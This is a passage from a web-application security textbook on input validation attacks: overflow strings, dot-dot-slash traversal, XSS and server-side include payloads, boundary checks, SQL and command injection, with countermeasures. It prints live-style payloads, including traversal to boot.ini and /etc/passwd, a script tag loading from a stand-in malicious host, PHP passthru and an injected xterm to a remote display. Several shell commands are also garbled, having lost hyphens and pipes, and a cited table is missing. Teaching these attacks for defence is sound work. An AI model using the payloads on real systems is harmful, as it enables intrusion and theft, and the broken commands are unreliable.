Common Input Validation Attacks

Buffer Overflow

Buffer overflows are less likely to appear in applications written in interpreted or high-level programming languages. For example, you would be hard-pressed to write a vulnerable application in PHP or Java. Yet it is possible that an overflow may exist in one of the language's built-in functions. In the end, it is probably better to spend time on other input validation issues, session management, and other web security topics. Of course, if your application consists of a custom ISAPI filter for IIS or a custom Apache module, then it is a good idea to test for buffer overflows or, perhaps more effectively, conduct a code security review.

To execute a buffer overflow attack, you merely dump as much data as possible into an input field. This is the most brutish and inelegant of attacks, but useful when it returns an application error. Perl is well suited for conducting this type of attack. One instruction creates whatever length necessary to launch against a parameter:

 $ perl -e 'print "a" x 500' aaaaaaa...repeated 500 times 

You can create a Perl script to make the HTTP requests (using the LWP module), or dump the output through netcat. Instead of submitting the normal argument, wrap the Perl line in back ticks and replace the argument. Here's the normal request:

 $ echo e "GET /login.php?user=faustus\nHTTP/1.0\n\n"  \ nc vv website 80 

Here's the buffer test, calling on Perl from the command line:

 $ echo e "GET /login.php?user=\ > `perl e 'print "a" x 500'`\nHTTP/1.0\n\n"  \ nc vv website 80 

This sends a string of 500 "a" characters for the user value to the login.php file. This Perl trick can be used anywhere on the UNIX (or Cygwin) command line. For example, combining this technique with the curl program reduces the problem of dealing with SSL:

$ curl https ://website/login.php?user=`perl e 'print "a" x 500'`

As you try buffer overflow tests with different payloads and different lengths, the target application may return different errors. These errors might all be "password incorrect," but some of them might indicate boundary conditions for the user argument. The rule of thumb for buffer overflow testing is to follow basic differential analysis or anomaly detection:

1. Send a normal request to an application and record the server's response.

2. Send the first buffer overflow test to the application, record the server's response.

3. Send the next buffer, record the server's response.

4. Repeat step 3 as necessary.

Whenever the server's response differs from that of a "normal" request, examine what has changed. This helps you track down the specific payload that produces an error (such as 7,809 slashes on the URL are acceptable, but 7,810 are not).

In some cases, the buffer overflow attack enables the attacker to execute arbitrary commands on the server. This is a more difficult task to produce once, but simple to replicate. In other words, experienced security auditing is required to find a vulnerability, but an unsophisticated attacker can download and run a premade exploit.

Canonicalization (Dot-Dot-Slash)

These attacks target pages that use template files or otherwise reference alternate files on the web server. The basic form of this attack is to move outside of the web document root in order to access system files, i.e., "../../../../../../../../../boot.ini". The actual server, IIS and Apache, for example, is hopefully smart enough to stop this. IIS fell victim to such problems due to logical missteps in decoding URL characters and performing directory traversal security checks. Two well-known examples are the IIS Superfluous Decode (..%255c..) and IIS Unicode Directory Traversal (..%c0%af..). More information about these vulnerabilities is at the Microsoft web site at http://www.microsoft.com/technet/security/bulletin/MS01-026.mspx and http://www.microsoft.com/technet/security/bulletin/MS00-078.mspx.

A web application's security is always reduced to the lowest common denominator. Even a robust web server falls due to an insecurely written application. The biggest victims of canonicalization attacks are applications that use templates or parse files from the server. If the application does not limit the types of files that it is supposed to view, then files outside of the web document root are fair game. This type of functionality is evident from the URL and is not limited to any one programming language or web server:

 /menu.asp?dimlDisplayer=menu.html /webacc?User.html=login.htt /SWEditServlet?station_path=Z&publication_id=2043&template=login.tem /Getfile.asp?/scripts/Client/login.js /includes/printable.asp?Link=customers/overview.htm 

This technique succeeds against web servers when the web application does not verify the location and content of the file requested . For example, the login page of Novell's web-based Groupwise application has "/servlet/webacc?User.html=login.htt" as part of the URL. This application is attacked by manipulating the User.html parameter:

 /servlet/webacc?User.html=../../../WebAccess/webacc.cfg%00 

This directory traversal takes us out of the web document root and into configuration directories. Suddenly, the login page is a window to the target web serverand we don't even have to log in!

 <HTML> <HEAD> <TITLE>GroupWise WebAccess Login</TITLE> </HEAD> <!login.htm> ..remainder of page truncated... 

 File does not exist: c:\Novell\java\servlets\com\novell\webaccess\ templates/nosuchfile/login.htt Cannot load file: c:\Novell\java\servlets\com\novell\webaccess\ templates/nosuchfile/login.htt. 

 http://website/servlet/webacc?user.html=../../../../../../../ boot.ini%00 [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(5)\WINNT [operating systems] multi(0)disk(0)rdisk(0)partition(5)\WINNT="Win2K" /fastdetect C:\BOOTSECT.BSD="OpenBSD" C:\BOOTSECT.LNX="Linux" C:\CMDCONS\BOOTSECT.DAT="Recovery Console" /cmdcons 

 ../../../../../../../boot.ini%00login.htt 

 Sent:    /includes/printable.asp?Link=../inetpub/wwwroot/default.asp Return:  Microsoft VBScript runtime error '800a0046'          File not found          /includes/printable.asp, line 10 Sent:    /includes/printable.asp?Link=../../inetpub/wwwroot/default.asp Return:  Microsoft VBScript runtime error '800a0046'          File not found          /includes/printable.asp, line 10 Sent:    /includes/printable.asp?Link=../../../inetpub/wwwroot/ default.asp Return:  Microsoft VBScript runtime error '800a0046'          File not found          /includes/printable.asp, line 10 Sent:    /includes/printable.asp?Link=../../../../inetpub/wwwroot/ default.asp Return:  Microsoft VBScript runtime error '800a0046'          ...source code of default.asp returned!... 

 Sent:    /includes/printable.asp?Link=../../../../inetpub Return:  Micosoft VBScript runtime error '800a0046'          Permission denied          /includes/printable.asp, line 10 Sent:    /includes/printable.asp?Link=../../../../inetpub/borkbork Return:  Micosoft VBScript runtime error '800a0046'          Path not found          /includes/printable.asp, line 10 Sent:    /includes/printable.asp?Link=../../data Return:  Micosoft VBScript runtime error '800a0046'          Permission denied          /includes/printable.asp, line 10 Sent:    /includes/printable.asp?Link=../../../../Program%20Files/ Return:  Micosoft VBScript runtime error '800a0046'          Permission denied          /includes/printable.asp, line 10 

Countermeasures

 Countermeasure    The best defense against canonicalization attacks is to remove all dots (.) from GET and POST parameters. The parsing engine should also catch dots represented in Unicode and hexadecimal.

Force all reads to happen from a specific directory. Apply regular expression filters that remove all path information preceding the expected filename. For example, reduce "/path1/path2/./path3/file" to "/file."

Secure file system permissions also mitigate this attack. First, run the web server as a least-privilege user, either the "nobody" account on UNIX systems or the "Guest" account on Windows systems. (You can also create custom accounts for this purpose.) Limit the web server account so that it can only read files from directories specifically related to the web application.

Move sensitive files such as include files (*.inc) out of the web document root to a directory, but to a directory that the web server can still access. This mitigates directory traversal attacks that are limited to viewing files within the document root. The server is still able to access the files, but the user cannot read them.

Html Injection

Script attacks include any method of submitting HTML formatted strings to an application that subsequently renders those tags. The simplest script attacks involve entering <script> tags into a form field. If the user-submitted contents of that field are redisplayed, then the browser interprets the contents as a JavaScript directive rather than displaying the literal value "<script>". The real targets of this attack are other users of the application who view the malicious content and fall prey to social engineering attacks.

There are two prerequisites for this attack. First, the application must accept user input. This sounds obvious; however, the input does not have to come from form fields. We will list some methods that can be tested on the URL, but headers and cookies are valid targets as well. Second, the application must redisplay the user input. The attack occurs when an application renders the data, which become HTML tags that the web browser interprets.

For example, here are two snippets from the HTML source that display query results:

 Source: 37 items found for <b>&lt;i&gt;test&lt;/i&gt;</b> Display: 37 items found for  <i>test</i>  Source: 37 items found for <b><i>test</i></b> Display: 37 items found for  test  

The user searched this site for "<i>test</i>". In the first instance, the application handles the input correctly. The angle brackets are HTML encoded and are not interpreted as tags for italics. In the second case, the angle brackets are maintained and they do produce the italics effect. Of course, this is a trivial example, but it illustrates how script attacks work.

 <script>document.write(document.cookie)</script> <script>alert('Salut!')</script> <script src="http://www.malicious-host.foo/badscript.js"></script> 

 <%= date() %> 

 <!--#include virtual="global.asa" --> <!--#include file="/etc/passwd" --> <!--#exec cmd="/sbin/ifconfig a" --> 

 <% java.util.Date today = new java.util.Date(); out.println(today); %> 

 <? print(Date("1 F d, Y")); ?> <? Include '/etc/passwd' ?> <? passthru("id");?> 

 $ lynx dump useragent="<script>" \ > http://website/page2a.html?tw=tests ...output truncated...    Netscape running on a Mac might send one like this: User Agent: Mozilla/4.5 (Macintosh; U; PPC)    And FYI, it appears that the browser you're currently using to view this document sends this User Agent string: 

 And FYI, it appears that the browser you're currently using to view this document sends this User Agent string: <BLOCKQUOTE> <PRE> <script> </PRE> </BLOCKQUOTE> 

Countermeasures

 Countermeasure    The most significant defense against script attacks is to turn all angle brackets into their HTML-encoded equivalents. The left bracket, "<", is represented by "&lt;" and the right bracket , ">", is represented by "&gt;". This ensures that the brackets are always stored and displayed in an innocuous manner. A web browser will never execute a "&lt;script&gt;" tag.

Once you've eliminated the major threat, you can focus on fine-tuning the application. Limit input fields to the maximum length expected for the data type. Names will not be longer than 20 characters. Phone numbers will be even shorter. Most script attacks require several characters just to get startedat least 17 if you just count the <script> pairs. Remember, this truncation should be performed on the server, not within the web browser.

Some applications intend to let users specify certain HTML tags such as bold, italics, and underline. In these cases, use regular expressions to validate the data. These checks should be inclusive, rather than exclusive. In other words, they should only look for acceptable tags, permit those tags, and HTML-encode all remaining brackets. For example, an inadequate regular expression that tries to catch <script> tags can be tricked:

 <scr%69pt> <<script> <a href="javascript:commands..."></a> <b+<script> <scrscriptipt> (bypasses regular expressions that replace "script" with null) 

Obviously, it is easier in this case to check for the presence of a positive (<b> is present) rather than the absence of a negative (<script> is not present).

More information about XSS and alternate ways in which payloads can be encoded is found at http://ha.ckers.org/xss.html.

Boundary Checks

Numeric fields have much potential for misuse. Even if the application properly restricts the data to numeric values, some of those values may still cause an error. Boundary checking is the simple technique of trying the extremes of a value. Swapping out UserID= 19237 for UserID=0 or UserID=-1 may generate informational errors or strange behavior. The upper bound should also be checked. A one-byte value cannot be greater than 255. A two-byte value cannot be greater than 65,535.

 http://www.victim.com/internal/CompanyList.asp?SortID=255 Your Search has timed out with too long of a list.     http://www.victim.com/internal/CompanyList.asp?SortID=256 Address Change Search Results     http://www.victim.com/internal/CompanyList.asp?SortID=257 Your Search has timed out with too long of a list.     http://www.victim.com/internal/CompanyList.asp?SortID=0 Address Change Search Results 

Notice that setting SortID to 256 returns a successful query, but 255 and 257 do not. SortID=0 also returns a successful query. It would seem that the application only expects an 8-bit value for SortID, which would make the acceptable range between 0 and 255. An 8-bit values "rolls over" at 255, so 256 is actually considered to have a value of 0.

You (probably) won't gain command execution or arbitrary file access from boundary checks. However, the errors they generate can reveal useful information about the application or the server. This check only requires a short list of values:

• Boolean   Any value that has some representation of true or false (T/F, true/ false, yes/no, 0/1). Try both values; then try a nonsense value. Use numbers for arguments that accept characters; use characters for arguments that accept digits.

• Numeric   Set zero and negative values (0 and -1 work best). Try the maximum value for various bit ranges, i.e., 256, 65536, 4294967296.

• String   Test length limitations. Determine if string variables, such as name and address, accept punctuation characters.

Manipulate Application Behavior

Some applications may have special directives that the developers used to perform tests. One of the most prominent is "debug=1". Appending this to a GET or POST request could return more information about variables, the system, or back-end database connectivity. A successful attack may require a combination of debug, dbg and true, T, or 1.

Some platforms may allow internal variables to be set on the URL. Other attacks target the web server. %3f.jsp will return directory listings against JRun x.x and Tomcat 3.2.x.

The htsearch CGI runs as both the CGI and as a command-line program. The command-line program accepts the -c [filename] to read in an alternate configuration file.

 http://victim.com/users/search?FreeText=on&kw=on&ss=% Exception in com.motive.web411.Search.processQuery(Compiled Code): java.lang.StringIndexOutOfBoundsException: String index out of range: 3 at java.lang.String.substring(Compiled Code) at javax.servlet.http.HttpUtils.parseName(Compiled Code) at javax.servlet.http.HttpUtils.parseQueryString(Compiled Code) at com.motive.mrun.MotiveServletRequest.parseParameters(Compiled Code) at com.motive.mrun.MotiveServletRequest.getParameterValues(Compiled Code) at com.motive.web411.MotiveServlet.getParamValue(Compiled Code) at com.motive.web411.Search.processQuery(Compiled Code) at com.motive.web411.Search.doGet(Compiled Code) at javax.servlet.http.HttpServlet.service(Compiled Code) at javax.servlet.http.HttpServlet.service(Compiled Code) at com.motive.mrun.ServletRunner.RunServlet(Compiled Code) 

SQL Injection And Datastore Attacks

This special case of input validation attacks can open up a database to complete compromise. The easiest test for the presence of a SQL injection attack is to append "or+1=1" to the URL and inspect the data returned by the server. The basis for a SQL injection attack is sending the application invalid input.

Even so, it is worth mentioning here that many SQL injection tests will reveal errors in files that do not access databases. An unaccounted single quote character often wreaks havoc on an application. Here's an URL that might be expected to have a SQL injection vulnerability.

http://website/in.php3?list=979077131'&site=4thedition

Yet the response indicates a file access error, which would lead us to try a different set of follow-up tests:

 Warning: fopen("/usr/home/topsites/lists/979077131\'/ vote_timeout.txt","a")  No such file or directory in /home/sites/site8/web/in.php3 on line 13 

The potential impact of a successful attack deserves a chapter of its own. Check out Chapter 8 for more details on how to tailor attacks against input validation to specific databases.

Command Execution

Many attacks only result in information disclosure such as database columns , application source code, or arbitrary file contents. Command execution is the ultimate goal for an attack. Some equivalent of command-line access quickly leads to a full compromise of the web server and possibly other systems on its local network.

 command1; command2; command3 

 <option value = "  24878478  " > Jones Energy Services Co. 

 <option value = "24878478; xterm -display 10.0.0.42:0.0" > Jones Energy Services Co. 

Encoding Abuse

As we noted in Chapter 1, URL syntax is defined in RFC 2396 (see "References and Further Reading" for a link). The RFC also defines numerous ways to encode URL characters so that they appear radically different but mean exactly the same thing. Attackers have exploited this flexibility frequently over the history of the Web to formulate increasingly sophisticated techniques for bypassing input validation. Table 6-1 lists the most common encoding techniques employed by attackers with some examples.

Php Global Variables

The overwhelming majority of this chapter presents techniques that are effective against web applications regardless of their programming language or platform. Different application technologies are neither inherently more secure nor less secure than their peers. Inadequate input validation is predominantly an issue that occurs when developers are not aware of the threats to a web application or underestimate how applications are exploited.

Nevertheless, some languages introduce features whose misuse or misunderstanding contributes to an insecure application. PHP has one such feature in its use of superglobals . A superglobal variable has the highest scope possible and is consequently accessible from any function or class in a PHP file. The four most common superglobals variables are $_ GET, $_POST, $_COOKIE, and $_SESSION. Each of these variables contains an associative array of parameters. For example, the data sent via a form POST are stored as name/ value pairs in the $_POST variable. It's also possible to create custom superglobal variables using the $ GLOBALS variable.

A superglobal variable that is not properly initialized in an application can be overwritten by values sent as a GET or POST parameter. This is true for array values that are expected to come from user-supplied input as well as values not intended for manipulation. For example, a config array variable might have an entry for root_dir . If config is registered as a global PHP variable, then it might be possible to attack it with a request that writes a new value:

http://website/page.php?config[root_dir]=/etc/passwd%00

PHP will take the config[root_dir] argument and supply the new valueone that was surely not expected to be used in the application.

It's not always easy to determine the name of global variables without access to source code; however, other techniques rely on sending GET parameters via a POST (or vice versa) to see if the submission bypasses an input validation filter.

More information is found at the Hardened PHP Project site, http://www.hardenedphp.net/. (See specifically http://www.hardened-php.net/advisory_172005.75.html and http://www. hardened -php.net/advisory_202005.79.html.)

Common Side-Effects

Input validation attacks do not have to result in application compromise. They help identify platform details from verbose error messages, reveal database schema details for SQL injection exploits, or merely identify whether an application is using adequate input filters.

Common Countermeasures

 Countermeasure    We've already covered several countermeasures during our discussion of input validation attacks. However, it's important to reiterate several key points to stopping these attacks:

• Use client-side validation for performance, not security. Client-side input validation mechanisms prevent innocent input errors and typos from reaching the server. This pre-emptive validation step can reduce the load on a server by preventing unintentionally bad data from reaching the server. A malicious user can easily bypass client-side validation controls, so they should always be complemented with server-side controls.

• Normalize input values. Many attacks have dozens of alternate encodings based on character sets and hexadecimal representation. Input data should be normalized before security and validation checks are applied to them. Otherwise, an encoded payload may pass a filter only to be decoded as a malicious payload at a later step. This step also includes measures taken to canonicalize file- and pathnames.

• Apply server-side input validation. All data from the web browser can be modified with arbitrary content. Therefore, proper input validation must be done on the server, where it is not possible to bypass validation functions.

• Constrain data types. The application shouldn't even deal with data that don't meet basic type, format, and length requirements. For example, numeric values should be assigned to numeric data structures, string values should be assigned to string data structures. Furthermore, a U.S. ZIP code should not only accept numeric values, but values exactly five-digits long (or the "ZIP plus four" format).

• Character encoding and "Output Validation". Characters used in HTML and SQL formatting should be encoded in a manner that will prevent the application from misinterpreting them. For example, present angle brackets in their HTML-encoded form (&lt; and &gt;). This type of output validation or character reformatting serves as an additional layer of security against HTML injection attacks. Even if a malicious payload successfully passes through an input filter, then its effect is negated at the output stage.

• White list/Black list. Use regular expressions to match data for authorized or unauthorized content. White lists contain patterns of acceptable content. Black lists contain patterns of unacceptable or malicious content. It's typically easier (and better advised) to rely on white lists because the set of all malicious content to be blocked is potentially unbounded. Also, you can only create black list patterns for known attacks; new attacks will fly by with impunity. Still, it's a good idea to have a black list of a few malicious constructs like those used in simple SQL injection and cross-site scripting attacks.

  Tip	Some characters have four methods of reference (so-called "entity notations"): named, decimal, hexadecimal, and UTF-8 (Unicode), but only the decimal form is reliable across browsers and platforms.

• Securely handle errors. Regardless of what language used to write the application, error handling should follow Java's concept of try , catch , finally exception handling. Try an action; catch specific exceptions that the action may cause; finally exit nicely if all else fails. This also entails a generic, polite error page that does not contain any system information.

• Require authentication. Configure the server to require proper authentication at the directory level for all files within that directory.

• Use least-privilege access. Run the web server and any supporting applications as an account with the least permissions possible. The risk to an application susceptible to arbitrary command execution but cannot access the /sbin directory (where many UNIX administrator tools are stored) is lower than a similar application that can execute commands in the context of the root user.